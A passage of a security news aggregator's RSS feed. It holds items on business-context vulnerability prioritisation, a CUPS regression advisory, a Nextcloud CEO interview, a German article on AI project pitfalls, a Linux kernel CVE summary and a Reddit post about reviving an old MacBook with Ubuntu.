highlighting where exposure is growing, and making it easier to explain how remediation work is reducing financial and operational risk.</span></p><h2>Two vulnerabilities, two very different business outcomes</h2><p><span>To see how this plays out in practice, it helps to compare two vulnerabilities that might appear similarly urgent in a standard scanner, but look very different once business context is added.</span></p><p><span><strong>Vulnerability A: The ghost in the machine</strong></span></p><p><span>A scanner flags a CVSS 9.8 critical remote code execution flaw in an aging media server. On paper, that score suggests immediate attention. Once more context is added, the picture changes. The asset sits on a segmented guest Wi-Fi VLAN, has no path to the corporate core, and has not been linked to in-the-wild exploitation for more than two years. In practical terms, the business impact is low. The issue still needs to be addressed, but it is unlikely to justify urgent remediation ahead of higher-consequence exposures.</span></p><p><span><strong>Vulnerability B: The quiet threat</strong></span></p><ul><li><p><span>A second finding carries a lower CVSS 7.2 high severity score, but affects a common web framework running on the organization’s primary customer portal. When AI correlates that vulnerability with asset and business context, the risk profile changes quickly. The portal is identified as a critical business process, estimated to support $250,000 in transactions per hour, while external signals point to growing exploit interest around the same framework. In that case, the business impact is far more serious. What looks like a lower-priority technical issue becomes a potential source of revenue disruption measured in millions per day.</span></p></li></ul><p><span>This is where AI-assisted prioritization becomes useful. It helps teams move beyond the assumption that the highest score always deserves the fastest response and instead focus on the vulnerabilities most likely to create operational or financial harm. In practice, that means spending less time working through a queue in score order and more time reducing the exposures that matter most to the business. </span></p><h2>How AI helps CISOs explain vulnerability risk in business terms</h2><p><span>When security leaders can move beyond reporting how many patches were deployed and begin showing how exposure is changing in financial or operational terms, the conversation becomes much more useful. A reduction in mean time to remediate may matter to a security team, but it carries more weight at the leadership level when it is tied to a lower likelihood of downtime, reduced regulatory exposure, or less risk to a revenue-generating service.</span></p><p><span>When vulnerability data is tied to business context, it becomes easier to justify automation, tooling, or headcount based on their contribution to resilience, continuity, and measurable risk reduction, rather than on activity alone. At that level, the conversation is less about severity scores and more about what is exposed, what it could affect, and where action matters most.</span></p><p><span>One of the more practical benefits of AI is that it can help security teams explain risk in a way leadership can act on. Instead of adding another layer of technical output, it can support clearer reporting on why one issue matters more than another, what is most likely to affect the business, and where action should come first.</span></p><p><span>As attack surfaces expand and exploit timelines continue to shrink, the gap between technical findings and business understanding will only become harder to manage. Organizations that can connect those two views more effectively will be in a much stronger position to prioritize the right work, explain risk more clearly, and make vulnerability management a more meaningful part of business decision-making.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8405-2: CUPS regression]]></title>
<description><![CDATA[USN-8405-1 fixed vulnerabilities in CUPS. The update introduced a
regression that cause CUPS to crash when parsing certain large printer PPD
files. This update fixes the problem.

Original advisory details:

 Ariel Silver discovered that CUPS incorrectly handled username comparisons
 during autho...]]></description>
<link>https://tsecurity.de/de/3599388/unix-server/usn-8405-2-cups-regression/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599388/unix-server/usn-8405-2-cups-regression/</guid>
<pubDate>Mon, 15 Jun 2026 16:16:09 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[USN-8405-1 fixed vulnerabilities in CUPS. The update introduced a
regression that cause CUPS to crash when parsing certain large printer PPD
files. This update fixes the problem.

Original advisory details:

 Ariel Silver discovered that CUPS incorrectly handled username comparisons
 during authorization checks. A local attacker could possibly use this issue
 to gain unauthorized access to restricted operations. (CVE-2026-27447)

 Asim Viladi Oglu Manizada discovered that CUPS incorrectly handled
 notify-recipient-uri values in the RSS notifier. A remote attacker could
 possibly use this issue to overwrite lp-writable files and cause a denial
 of service. (CVE-2026-34978)

 Jacob Newman discovered that CUPS incorrectly handled filter option strings
 when processing job attributes. An attacker could use this issue to cause
 CUPS to crash, resulting in a denial of service, or possibly execute
 arbitrary code. (CVE-2026-34979)

 Asim Viladi Oglu Manizada discovered that CUPS incorrectly handled
 page-border values in shared PostScript queues. A remote attacker could
 possibly use this issue to execute arbitrary code. (CVE-2026-34980)

 Asim Viladi Oglu Manizada discovered that CUPS incorrectly handled
 localhost authentication to attacker-controlled IPP services. A local
 attacker could possibly use this issue to overwrite arbitrary files
 and execute arbitrary code. (CVE-2026-34990)

 Tomer Fichman discovered that CUPS incorrectly handled negative
 job-password-supported values. A local attacker could possibly use this
 issue to cause CUPS to crash, resulting in a denial of service.
 (CVE-2026-39314)

 Tomer Fichman discovered that CUPS incorrectly handled temporary printer
 deletion. An attacker could possibly use this issue to cause CUPS to crash,
 resulting in a denial of service, or to execute arbitrary code.
 (CVE-2026-39316)

 Tomer Fichman discovered that CUPS incorrectly handled certain malformed
 SNMP responses. An attacker could possibly use this issue to obtain
 sensitive information. (CVE-2026-41079)]]></content:encoded>
</item>
<item>
<title><![CDATA[Bambu Lab's 'most impressive 3D printer' gets a big price cut in the sales — and it smashed all expectations in our workshop tests]]></title>
<description><![CDATA[A 3D printer, laser engraver, cutter, and pen plotter in one enclosure; the H2D redefines what a desktop maker machine can do.]]></description>
<link>https://tsecurity.de/de/3598667/it-nachrichten/bambu-labs-most-impressive-3d-printer-gets-a-big-price-cut-in-the-sales-and-it-smashed-all-expectations-in-our-workshop-tests/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598667/it-nachrichten/bambu-labs-most-impressive-3d-printer-gets-a-big-price-cut-in-the-sales-and-it-smashed-all-expectations-in-our-workshop-tests/</guid>
<pubDate>Mon, 15 Jun 2026 11:47:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A 3D printer, laser engraver, cutter, and pen plotter in one enclosure; the H2D redefines what a desktop maker machine can do.]]></content:encoded>
</item>
<item>
<title><![CDATA[Nextcloud CEO: Open source moves from ‘a nerdy audience’ to the geopolitical stage]]></title>
<description><![CDATA[MUNICH — Amid trans-Atlantic political and trade tensions, digital sovereignty — once a relatively niche concern — has jumped to the top of the agenda for European organizations wary of their reliance on US technology suppliers.



For many, including European Union policy makers, increased use o...]]></description>
<link>https://tsecurity.de/de/3598357/it-nachrichten/nextcloud-ceo-open-source-moves-from-a-nerdy-audience-to-the-geopolitical-stage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598357/it-nachrichten/nextcloud-ceo-open-source-moves-from-a-nerdy-audience-to-the-geopolitical-stage/</guid>
<pubDate>Mon, 15 Jun 2026 09:32:51 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>MUNICH — Amid trans-Atlantic political and trade tensions, digital sovereignty — once a relatively niche concern — has <a href="https://www.computerworld.com/article/4109029/global-uncertainty-is-reshaping-cloud-strategies-in-europe.html">jumped to the top of the agenda for European organizations</a> wary of their reliance on US technology suppliers.</p>



<p>For many, including European Union policy makers, increased use of open source software is a <a href="https://www.computerworld.com/article/4115567/eu-looks-to-bolster-its-open-source-sector-to-counter-us-cloud-dominance.html">key part of the answer</a>, offering an alternative to proprietary platforms from a handful of large US vendors.</p>



<p>That’s the view of Frank Karlitschek, CEO of Nextcloud, the German software vendor that bills itself as an open-source alternative to software suites from the likes of Microsoft and Google. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Nextcloud-Summit_Frank-Karlitschek-2026-0441.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Nextcloud CEO Frank Karlitschek" class="wp-image-4184629" width="1024" height="683" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Nextcloud CEO Frank Karlitschek speaking at the German software company’s Nextcloud Summit 2026.</p>
</figcaption></figure><p class="imageCredit">Nextcloud</p></div>



<p>Karlitschek founded the company in 2016, forking OwnCloud’s open-source file-sharing software. Since then, Nextcloud has expanded its products to include a range of productivity and collaboration tools that organizations can install and run on their own servers or access <a href="https://www.computerworld.com/article/4064116/a-european-alternative-to-m365-nextcloud-looks-to-capitalize-on-digital-sovereignty-interest.html">via cloud providers</a>. </p>



<p>More recently, Nextcloud helped develop the Euro-Office application suite, which <a href="https://www.computerworld.com/article/4178807/open-source-euro-office-productivity-suite-to-launch-june-9.html">launched last week</a> as an open source alternative to Microsoft Office and others, and continues to <a href="https://www.computerworld.com/article/4183069/nextcloud-adds-euro-office-to-hub-workplace-suite-expands-ai-assistant.html">build out its Nextcloud Hub</a> with AI assistant and agent features. The company now says revenues are growing at between 50% to 100% year over year.</p>



<p><em>Computerworld</em> spoke to Karlitschek at <a href="https://nextcloud.com/summit/" data-type="link" data-id="https://nextcloud.com/summit/" target="_blank" rel="noreferrer noopener">Nextcloud Summit</a> about momentum around digital sovereignty, the European Commission’s <a href="https://www.computerworld.com/article/4181816/eu-takes-first-steps-to-reduce-reliance-on-us-hyperscalers.html">Tech Sovereignty Package proposals</a>, and how Nextcloud hopes to evolve in the coming years.</p>



<p>The following interview was edited for length and clarity.</p>



<p><strong>When Nextcloud launched, there was a big push in Europe away from on-premise software towards US cloud providers. How have attitudes towards open source and awareness of alternatives providers changed since then? “</strong>I’ve been doing open source since the ‘90s; at the time it was mostly for a nerdy audience — a very small group of people who really care about software and being in control. The sovereignty part was always there. It’s the core idea behind open source that you can understand what the software is doing, you can deploy it wherever you want, you can study it and change it, and so on. </p>



<p>“At the time, it was very niche, and since then it’s really growing and growing. There are certain points in time that really accelerated the growth; something like the Snowden revelations, for example, or the whole discussion about GDPR and certain legislation. And then, of course, the current geopolitical situation.  </p>



<p>“I personally find it interesting that it grew from something that is just interesting for software developers, and now it’s on the geopolitical stage. I have meetings with big politicians who really care about it now, and I personally find it interesting that it’s increasingly understood by — I wouldn’t say the mainstream, but more and more people.</p>



<p>“At the beginning of Nextcloud, we mostly talked with IT managers looking for a solution; they care about how it works, the price and other things. But now we are also talking with the C-level people. It’s part of an overall strategy of a company, to say, ‘Hey, we need to look into the dependencies, we want to have a solution that fits into the strategy of the company.’</p>



<p>“In the past, it was like a commodity – it’s just some software, who cares? Now, it’s really part of the company strategy. That’s really interesting.”</p>



<p><strong>There’s been a lot of interest around digital sovereignty over the past couple of years. To what degree is this translating into action, with organizations migrating away from US cloud providers? “</strong>The interest is gigantic. Everybody’s talking about it, we have so many contacts and people coming to us. Not everybody is doing it — a lot of people are just exploring and seeing what the options are. </p>



<p>“Obviously, we hope that this will translate into actions in a few months. At the moment, it’s a lot of talking and exploring the options. As a company, we are also growing a lot in customer base.  But the interest in this space is even bigger; we see it as the beginning of a funnel.</p>



<p>‘In defense we see a lot of interest, then also everything around education is very important for us, then other regulated markets like the healthcare, for example. Finance is an interesting one.”</p>



<p><strong>A lot of the conversations around digital sovereignty are tied to the current geopolitical situation and even the US administration. Do you see demand for sovereign technology as a structural change or are some organizations holding back to see how the situation improves in the future? “</strong>I see it as a long-term trend. If you look at the IT budgets and projects in the ‘90s, it was some something unimportant. It was, of course, important that the printer works and the fax machine works, but it was not definitely not strategic for the company. </p>



<p>“And then in 2000, the whole cloud trend came up, and there was the big hope that this will save money. It was always the narrative with cloud computing that you can just outsource it and save money and it’s great. </p>



<p>“Nowadays, people realize that it’s not something that you can just ignore. I wouldn’t say that everything comes back on premise, but people care about it now. They understand it’s not just a commodity, like water, or electricity that comes out of the wall and you don’t care what’s behind it. People realize that it’s something that has an impact on the future of an organization, from a vendor lock-in perspective, from a cost perspective, from an industry espionage perspective, and competitiveness. With open source, you’re more flexible. So, I think the trend that this is all more strategic and important for the future, this will go on.”</p>



<p><strong>The European Commission recently published its Tech Sovereignty Package, including its open source strategy. Are these proposals sufficient to address the concern around digital sovereignty and support the open source ecosystem in Europe?</strong></p>



<p><strong>“</strong>It’s great, I really like it. I was actually surprised they listened so well. But now the real challenge is to actually do it; this still needs to happen. The description of the problem and a possible solution, this is all very good. I’m surprised, I’m happy about it, but to put this into actually binding law, this still needs happen.”</p>



<p><strong>Would you like to see any changes to the current proposals before they’re gets passed into legislation? “</strong>At the moment, they have these four different risk levels, and the most critical one — No. 4 — is one where they accept only open source and European solutions. This is the highest risk level, but this is only for 1% of the market. I hope that it’s better understood that more than 1% should care about this more.</p>



<p>“If you have something which is completely not critical, maybe doesn’t possess any personal data at all — sure, it’s totally fine [to use non-EU suppliers]. But if you have GDPR requirements, espionage protection, no vendor lock-in, and so on, then there should be more of that [the highest requirement level].”</p>



<p><strong>US firms have attempted to address European customers’ concerns in different ways, with sovereign marketed cloud services and joint ventures with European providers. Microsoft 365 Local is designed to run on premise. Where do you draw the line between what’s actually a sovereign solution and what some call ‘sovereignty washing? “</strong>Sovereignty has different dimensions, of course. But if you look at the problem of the CLOUD Act alone, which gives foreign agencies full access to the data here, then the whole idea that it’s enough to have European data centers — that’s not enough. It’s clearly written in the CLOUD Act, that even with [European] data centers, or subsidiaries, it still applies.  </p>



<p>“Microsoft tries to find a solution there with its Delos idea; a company that is owned by SAP — a German company — and Microsoft delivers only the software. But even then, you have this dependency, because software needs updates and software security updates. And if they’re not available, or if someone puts a backdoor into the software, which is possible, then you still have a problem. </p>



<p>“So, they’re trying really, really hard to find a way around the problem, but it’s not easy for them.”</p>



<p><strong>To look ahead a bit in terms of the product strategy, there were announcements for Nextcloud Hub this week around AI agents, and the program to work with independent software vendors. What do these say about Nextcloud’s future? “</strong>The overall product strategy will not change so much; it’s about having state-of-the-art collaboration software — but with a lot more control, security and safety — that’s open source and independent where you host it. So this will always stay, but of course, there’s some additional factors that come into play now, like the AI impact that we see and want to leverage with our agent strategy. </p>



<p>“We’ve had this for one and a half years already, but we are expanding that. In the future, you might still use an interface in a classic way that you open documents and type in text and so on. But there are also a lot of operations that can be automated in the future with AI. And this is something we really invest a lot into. </p>



<p>“Another aspect of AI is how easy it is to build custom software around it. The coding models are getting better all the time, which means there will be more and more custom business software. This is what we want to capture with our ISV program. Software development will become easier, but you don’t want to deploy just random software in your company, you want to have something that is tested, certified and secured, and that somebody’s accountable for it. This can be something we can provide at Nextcloud.”</p>



<p><em>Editor’s note: NextCloud paid for Matthew Finnegan’s travel and hotel costs for NextCloud Summit 2026, but had no editorial role in the creation of this story.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Welche Fehler Sie beim Aufsetzen Ihres KI-Projekts vermeiden sollten]]></title>
<description><![CDATA[Im Sommer letzten Jahres brachte eine vielbeachtete Studie des MIT etwas Nüchternheit und Pragmatismus in die bis dahin euphorische KI-Branche. Der Studie zufolge konnten zum Zeitpunkt der Erhebung nur 5 Prozent aller Projekte mit generativer KI einen messbaren geschäftlichen Mehrwert nachweisen ...]]></description>
<link>https://tsecurity.de/de/3598041/it-security-nachrichten/welche-fehler-sie-beim-aufsetzen-ihres-ki-projekts-vermeiden-sollten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598041/it-security-nachrichten/welche-fehler-sie-beim-aufsetzen-ihres-ki-projekts-vermeiden-sollten/</guid>
<pubDate>Mon, 15 Jun 2026 07:05:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Im Sommer letzten Jahres brachte eine vielbeachtete Studie des MIT etwas Nüchternheit und Pragmatismus in die bis dahin euphorische KI-Branche. Der <a href="https://aileaderscouncil.org/the-genai-divide-state-of-ai-in-business-2025/" target="_blank" rel="noreferrer noopener">Studie</a> zufolge konnten zum Zeitpunkt der Erhebung nur 5 Prozent aller Projekte mit generativer KI einen messbaren geschäftlichen Mehrwert nachweisen – und das obwohl die befragten Unternehmen sich sehr engagiert in Sachen KI zeigten und 90 Prozent von ihnen sich sogar ernsthaft mit der Anschaffung von KI-Produkten beschäftigt hatten.</p>



<p>Dem Engagement der Unternehmen tat dies keinen Abbruch. Die KI-Transformation läuft weiterhin auf Hochtouren und KI-Pilotprojekte dominieren die Aktivität von IT- und Entwicklungsabteilungen. Aktuelleren Studien zufolge ist der Anteil der KI-Projekte, die ihren angepeilten ROI erreichen oder übertreffen, auf rund 20 Prozent angestiegen. Doch nur etwa ein Drittel aller Pilotprojekte schafft es in den Produktivbetrieb, berichten unisono <a href="https://deloitte.com/us/state-of-ai" target="_blank" rel="noreferrer noopener">Deloitte</a> und <a href="https://www.mckinsey.com/capabilities/quantumblack/our-insights/the-state-of-ai" target="_blank" rel="noreferrer noopener">McKinsey</a> in entsprechenden Studien. Nur die KI-Vorreiter, etwa ein Viertel der von Deloitte befragten Unternehmen, hatten es bis zum Spätsommer 2025 geschafft, mehr als 40 Prozent ihrer KI-Projekte erfolgreich in den Geschäftsbetrieb zu integrieren.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/shutterstock_1936499845.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Industry 4.0 Modern Factory: Team of Innovative Industrial Engineers Use Computer and 3D Printer to Build Complex Component. Group of Scientists Use High-Tech Machinery for Futuristic Design" class="wp-image-4183559" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Um mit agentischer KI auch das nächste Kapitel der KI-Innovation anzugehen, ist das Vorhandensein einer Daten- und KI-Governance eine absolute Voraussetzung.</p>
</figcaption></figure><p class="imageCredit">shutterstock/Gorodenkoff</p></div>



<h2 class="wp-block-heading">Pilotprojekte im Reality-Check</h2>



<p>Verschiedene Studien, ebenso wie die Erfahrungen vieler Experten zeigen, dass die Gründe für das Scheitern von KI-Pilotprojekten über alle Branchen und Unternehmensgrößen hinweg ähnlich sind. Einer der häufigsten Fehler besteht darin, dass KI-Projekte als Initiativen der IT-Abteilung aufgesetzt werden, ohne Absprache mit der jeweiligen Fachabteilung. Dass dies nicht gut gehen kann, versteht sich eigentlich von selbst.</p>



<p>„Die IT kennt die spezifischen Probleme in Fachbereichen wie Finanzen, Produktion, Vertrieb oder Qualitätssicherung in der Regel nicht“, erklärt Dan Hoffmann, Product Specialist für Data &amp; AI bei OEDIV, einem Unternehmen der Oetker-Gruppe. „Deswegen müssen die Gespräche zur Erkundung von Anwendungsfällen zwingend zusammen mit den Fachbereichen geführt werden. Vor allem mit den Entscheidungsträgern, die eine finanzielle Verantwortung für ihren Bereich tragen. Denn sie sind diejenigen, die am besten einschätzen können, wie sich die Lösung eines aktuellen Problems monetär auswirken würde.“</p>



<p>Ein weiterer Fehler besteht darin, sich allzu sehr von den Fähigkeiten großer Sprachmodelle (Large Language Models, LLMs), wie sie etwa in  ChatGPT oder Claude eingesetzt werden, blenden zu lassen. „LLMs haben zwar enorme Fähigkeiten, sie sind aber keine Wissensdatenbanken und besitzen auch kein Langzeitgedächtnis“, erklärt Hoffmann. „So können sie zum Beispiel plausible Ergebnisse liefern, die aber nicht zwingend richtig sind. Falsche Erwartungen gegenüber solchen Modellen können zu Fehlinvestitionen und Enttäuschungen führen.“</p>



<h2 class="wp-block-heading">Kein ROI ohne solides Datenfundament</h2>



<p>Von solchen Fehlern abgesehen identifiziert Deloitte als Hauptgrund für das Scheitern von KI-Projekten eine grundlegende Diskrepanz zwischen den Anforderungen eines Pilotprojekts und denen des Live-Betriebs. So laufen Pilotprojekte meist in einer isolierten Umgebung und arbeiten mit einem bereinigten, oft statischen Datenkontingent. Der Live-Betrieb hat hingegen ungleich höhere Anforderungen – von den nötigen Computing-Ressourcen und die Leistungsfähigkeit der Dateninfrastruktur über die Integration mit anderen Systemen bis hin zur Betriebssicherheit, Governance und Compliance.</p>



<p>Ein allzu klein dimensioniertes Pilotprojekt kann außerdem zu einer Fehleinschätzung der tatsächlichen Betriebskosten im Live-Betrieb führen. „Unternehmen sollte nicht den Fehler begehen, die Betriebskosten eines Prototyps als Metrik für den Betrieb der Live-Anwendung zu nehmen“, mahnt Hoffmann. „Jeder API-Call, jeder menschliche Review-Schritt verursacht im Nachhinein Kosten, die im Rahmen des Prototyps möglicherweise so nicht angefallen sind.“ Dessen sollte man sich bewusst sein, denn bei dieser Haltung seien Folgefehler vorprogrammiert.</p>



<p>„Viele IT-Abteilungen nehmen für ihr Pilotprojekt mächtige Tools und setzen damit kleinere Use Cases um, in der Hoffnung, dadurch ihr Management zu beeindrucken und ein möglichst großes Budget für den Aufbau ihrer KI-Infrastruktur zu bekommen“, erklärt Dan Hoffmann. „Der Use Case mag als Pilotprojekt funktionieren, scheitert aber meistens bei der Überführung in den Produktivbetrieb, weil die Voraussetzungen dafür nicht erfüllt sind. Am häufigsten mangelt es an einer integrierten Datenbasis, die über Abteilungs- und Prozessgrenzen hinweg abschließbar ist. Ohne sie ist die KI nur begrenzt nutzbar, weil sie den Gesamtkontext einer Aufgabe nicht berücksichtigen kann.“</p>



<h2 class="wp-block-heading">Ohne Governance keine Kontrolle</h2>



<p>Existiert eine KI-fähige Basisinfrastruktur nicht, schmilzt auch der angepeilte ROI sehr schnell dahin. KI-Vorreiter haben diese Notwendigkeit schon früh erkannt. In der McKinsey-Studie sagten 46 Prozent der Unternehmen, die bereits KI-Anwendungen live betreiben, dass sie über eine zentralisierte Dateninfrastruktur und -Governance verfügen, weitere 39 Prozent haben ihre Ressourcen zu einem Großteil konsolidiert. Für die Bereiche Risikomanagement und Compliance haben sogar 57 Prozent dieser Unternehmen eine zentrale Instanz eingerichtet. Das Resultat: Unternehmen, die ihre Infrastrukturbasis den Anforderungen von KI-Anwendungen angepasst haben, profitieren am meisten von ihren KI-Projekten, indem sie ihre Produktivität steigern, Routinetätigkeiten automatisieren, Betriebskosten senken, die Kundenzufriedenheit steigern und ihren Umsatz erhöhen.</p>



<p>Die Nutzung so vieler verschiedenartiger Daten in unternehmensweiten Prozessen setzt allerdings eine entsprechende Daten-Governance voraus. „Je stärker KI in Entscheidungen, Kommunikation oder Automatisierung eingreift, desto wichtiger wird die Frage, woher Daten stammen, wer sie sehen darf, wie aktuell sie sind und unter welchen Regeln sie verwendet werden“, erklärt Hoffmann. „Eine integrierte Datenbasis ist deshalb nicht gleichbedeutend mit einem unreglementierten Data Lake, sondern mit einer strukturierten, kontrollierbaren und nachvollziehbaren Informationsgrundlage. Für Unternehmen ist das keine reine Compliance-Frage, sondern eine Voraussetzung, um KI sicher in kritische Prozesse zu integrieren.“</p>



<p>Aufgabe der Daten-Governance ist es, die Datenqualität und -konsistenz zu sichern, die Einhaltung von Zugriffsberechtigungen und Datenschutzstandards wie die DSGVO zu überwachen, Urheberrechte und Lizenzen zu berücksichtigen, Vorurteile zu vermeiden sowie die Skalierbarkeit, Wartbarkeit und Aktualität der Datenbasis sicherzustellen. Daten-Governance ist als Teil einer übergreifenden KI-Governance zu verstehen. Letztere ist wiederum eines der wichtigsten Mittel, um das für viele KI-Anwendungen gesetzlich geforderte Risikomanagement zu betreiben. Hierfür haben die OECD, die EU und die US-Standardisierungsbehörde NIST jeweils <a href="https://www.oecd.org/en/publications/common-guideposts-to-promote-interoperability-in-ai-risk-management_ba602d18-en.html" target="_blank" rel="noreferrer noopener">Leitlinien</a>, einen <a href="https://eur-lex.europa.eu/legal-content/DE/TXT/?uri=CELEX:32024R1689" target="_blank" rel="noreferrer noopener">Rechtsrahmen</a> und ein <a href="https://www.nist.gov/itl/ai-risk-management-framework" target="_blank" rel="noreferrer noopener">Risk Management Framework</a> herausgegeben.</p>



<h2 class="wp-block-heading">Langfristige Ziele setzen</h2>



<p>Um mit agentischer KI auch das nächste Kapitel der KI-Innovation anzugehen, ist das Vorhandensein einer Daten- und KI-Governance eine absolute Voraussetzung. Agentische Governance setzt auf dieses Fundament auf, um die deutlich höheren Anforderungen an Datenintegration und Interoperabilität zu erfüllen. „Ein Agent, der nicht nur antwortet, sondern Aufgaben ausführt, muss Systemzustände, Regeln, Berechtigungen, Prozesskontexte und aktuelle Geschäftsdaten zuverlässig verstehen“, sagt Dan Hoffmann.</p>



<p>„Governance und Vertrauen sind das Fundament für Wachstum“, schreibt die Unternehmensberatung Bain &amp; Company in einem aktuellen <a href="https://www.bain.com/insights/governance-trust-and-the-data-foundation/" target="_blank" rel="noreferrer noopener">Advisory</a> zum diesem Thema. Berechtigungen, Zugriff auf Tools und die Entscheidungen oder Transaktionen, die KI-Agenten ausführen können, müssten deshalb innerhalb festgelegter Parameter liegen. „Die Governance erfordert zudem Identitäts- und Authentifizierungsmodelle, die das Least-Privilege-Prinzip nicht nur auf menschliche Nutzer anwenden, sondern auch auf autonome Agenten ausweiten.“</p>



<p>Apropos Innovation: Das Marketing der IT/KI-Anbieter hatte zur Folge, dass viele Geschäftsführer und Vorstände allein auf kurzfristige Steigerungen in der Produktivität ihrer Mitarbeiter sowie schnellere, effizientere Prozesse setzten. Diese Erwartung ist berechtigt und sie wurde von 80 Prozent der Befragten in der McKinsey-Studie bestätigt. Doch Unternehmen, die aktuell den größten Nutzen aus KI ziehen, erkennen deutlicher die langfristige Rolle der KI für ihr Unternehmen. In der Studie nannten sie wesentlich häufiger Wachstum oder Innovation als zusätzliche Ziele ihres KI-Engagements als der Rest der Befragten)</p>



<p><a href="https://www.oediv.de/data-ai/" target="_blank" rel="noreferrer noopener">Ihr KI-Fundament prüfen<br></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-46021 | Linux Kernel up to 6.6.139/6.12.85/6.18.26/7.0.3 thermal thermal_zone_device_register_with_trips use after free (Nessus ID 321065)]]></title>
<description><![CDATA[A vulnerability was found in Linux Kernel up to 6.6.139/6.12.85/6.18.26/7.0.3. It has been declared as critical. This issue affects the function thermal_zone_device_register_with_trips of the component thermal. Such manipulation leads to use after free.

This vulnerability is referenced as CVE-20...]]></description>
<link>https://tsecurity.de/de/3597671/sicherheitsluecken/cve-2026-46021-linux-kernel-up-to-661396128561826703-thermal-thermalzonedeviceregisterwithtrips-use-after-free-nessus-id-321065/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597671/sicherheitsluecken/cve-2026-46021-linux-kernel-up-to-661396128561826703-thermal-thermalzonedeviceregisterwithtrips-use-after-free-nessus-id-321065/</guid>
<pubDate>Mon, 15 Jun 2026 00:08:47 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/linux:kernel">Linux Kernel up to 6.6.139/6.12.85/6.18.26/7.0.3</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. This issue affects the function <code>thermal_zone_device_register_with_trips</code> of the component <em>thermal</em>. Such manipulation leads to use after free.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-46021">CVE-2026-46021</a>. The attack needs to be initiated within the local network. No exploit is available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[2011 MacBook Pro looks like it just came out of the store after installing UBUNTU]]></title>
<description><![CDATA[What kind of magic is this? I bought this old 2011 MacBook Pro upgraded with more RAM and an SSD. I tried installing Monterey and Sonoma on it with OpenCoreLegacy and I honestly don't know how people can recommend this kind of installation. The Mac was clearly struggling. It ran hot with anything...]]></description>
<link>https://tsecurity.de/de/3597589/linux-tipps/2011-macbook-pro-looks-like-it-just-came-out-of-the-store-after-installing-ubuntu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597589/linux-tipps/2011-macbook-pro-looks-like-it-just-came-out-of-the-store-after-installing-ubuntu/</guid>
<pubDate>Sun, 14 Jun 2026 22:14:09 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>What kind of magic is this?</p> <p>I bought this old 2011 MacBook Pro upgraded with more RAM and an SSD. I tried installing Monterey and Sonoma on it with OpenCoreLegacy and I honestly don't know how people can recommend this kind of installation.</p> <p>The Mac was clearly struggling. It ran hot with anything, even after being cleaned and having the thermal paste replaced. Half the features didn't work or weren't applicable, it was full of bugs, Night Shift would make text flicker while scrolling and turn it orange. Browsers in full screen were no longer recognized by the trackpad. I could only switch or close tabs using CMD, and don't even get me started on the App Store, which supported practically nothing. I had a knockoff macOS that wasn't even remotely macOS.</p> <p>I downloaded Ubuntu with a lot of anxiety, thinking it would require who knows how much effort, but instead everything was PERFECT. I knew there were some configurations to do at the start because of the Wi-Fi and some fan and battery issues specific to this MacBook, but with AI I was able to tinker in the terminal and between one <code>sudo</code> and the next I fixed everything, and the Mac was REBORN. It looks like it just came out of the store. It doesn't run hot, it's smooth, the blue light filter works perfectly, everything works.</p> <p>Ubuntu is absolutely easy and intuitive. I prefer it to Windows for sure, and maybe even to macOS. It's genuinely foolproof. A popup appears for everything, YOU CANNOT GO WRONG. Seriously, who spread the rumor that Linux is difficult? It's crazy. I'm a total noob and I probably never would have done it without AI, because I had no desire to read through forums and guide after guide, but AI simplified that part, and now Linux might become my favorite OS. I also love that Ubuntu is basically the macOS of Linux.</p> <p>Whoever you are, creator of Ubuntu, congratulations, you did an amazing job, far more competent than billion-dollar companies. Thanks to you, this MacBook I bought to learn how to tinker has just been reborn.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Intrepid-Routine-875"> /u/Intrepid-Routine-875 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1u5vdxu/2011_macbook_pro_looks_like_it_just_came_out_of/">[link]</a></span>   <span><a 